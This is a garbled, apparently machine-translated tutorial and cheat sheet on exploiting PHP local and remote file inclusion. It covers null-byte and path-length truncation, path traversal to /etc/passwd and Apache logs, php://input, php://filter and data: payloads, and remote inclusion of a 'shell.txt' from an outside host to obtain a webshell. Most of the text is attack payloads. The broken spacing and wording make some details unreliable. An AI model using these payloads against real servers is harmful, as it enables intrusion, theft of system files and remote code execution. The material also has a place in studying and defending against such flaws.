PHP File Inclusion Vulnerability Exploitation

I. Application of PHP configuration in file inclusion the File Inclusion Vulnerability occurs when a programmer introduces external submitted data to the inclusion process, this vulnerability is currently the most frequently used vulnerability in Web attacks. Attackers can easily obtain server access permissions (that is, obtain webshell ). Files include Local File Inclusion sion and Remote File Inclusion Sion. Allow_url_fopen and allow_url_include are the conditions for determining whether to include local file inclusion (LFI) or remote file inclusion (RFI). In PHP4, there is only one allow_url_fopen option. The Remote File Inclusion Vulnerability occurs when allow_url_fopen and allow_url_include are 0n. On the contrary, the local file inclusion vulnerability occurs. Two typical formats of file inclusion are as follows: 1. the files to be truncated include ($ _ GET ['SB ']); include ("$ _ GET ['dir']/test. php "); here to use file inclusion, you must break through the following/test. php restrictions, and there are three methods to truncate the following data. (1) Use % 00 to intercept suitable cases: if Magic_quote is off, 2) use? Suitable for truncation: Remote File Inclusion (RFI), equivalent to constructing a Get request. http://127.0.0.1:81/include.php?dir=http://127.0.0.1:81/shell.txt ? (3) When the path length reaches a certain length limit, the truncation length is usually 240 for Windows, and 4096 for Linux: because Windows and Linux File names both have a maximum path length (MAX_PATH) limit, when the length of the submitted file name exceeds the maximum path length limit, the subsequent content will be truncated, to achieve the file inclusion effect include. php? Dir = http://127.0.0.1:81/shell.txt////////////////////////////////////////////////////////////////////// 2. include ("$ _ GET ['dir']"); you can specify a file name in dir to implement file inclusion without truncation. When register_globals is on, if the variable is not initialized, the file inclusion effect can be achieved. Generally, the File Inclusion Vulnerability published on the Internet is not as direct as the preceding two types, most files can be included only when register_globals is used together. Basic File Inclusion Vulnerability: code: * contains files in the same path :? File =. htaccess * path traversal :? File = .. /.. /.. /.. /.. /.. /.. /.. /.. /var/lib/locate. db (this file is very interesting because it allows you to search for file systems) * files containing PHP code injection :? File = .. /.. /.. /.. /.. /.. /.. /.. /.. /var/log/apache/error. log (you can find other possible Apache dirs here and other ways here. think about all possible logfiles, file uploads, session files etc .) restricted local files include: code: * Null character Injection (Null Byte Injection ):? File = .. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd % 00 (magic_quotes_gpc = off required) * column directory (Null Byte Injection ):? File = .. /.. /.. /.. /.. /.. /.. /.. /.. /var/www/accounts/% 00 (BSD only, magic_quotes_gpc = off, details here) * Path Truncation ):? File = .. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd. \. \. \. \. \. \. \. \. \. \. \... (For more information, see here and here) * point truncation :? File =.../../etc/passwd ................... (Windows only. For more details, see here) The Basic Remote files include: code: * contains the Remote Code (Including Remote code ):? File = [http | https | ftp]: // websec.wordpress.com/shell.txt (allow_url_fopen = On and allow_url_include = On) * use the php input stream (Using PHP stream php: // input ):? File = php: // input (specify your payload in the POST parameters, watch urlencoding, details here, requires allow_url_include = On) * use the PHP filter function (Using PHP stream php: // filter ):? File = php: // filter/convert. base64-encode/resource = index. php (lets you read PHP source because it wont get evaluated in base64. More details here and here) * Using data URIs :? File = data: // text/plain; base64, SSBsb3ZlIFBIUAo = (allow_url_include = On) * cross-site scripting (Using XSS ):? File = http://127.0.0.1/path/xss.php?xss=phpcode (Makes sense if firewalled or only whitelisted domains allowed :*? File = http://websec.wordpress.com/shell *? File = http://websec.wordpress.com/shell . Txt? *? File = http://websec.wordpress.com/shell . Txt % 23 (requires allow_url_fopen = On and allow_url_include = On) Static Remote File Inclusion Vulnerability: code: * Man In The Middle (lame indeed, but often forgotten)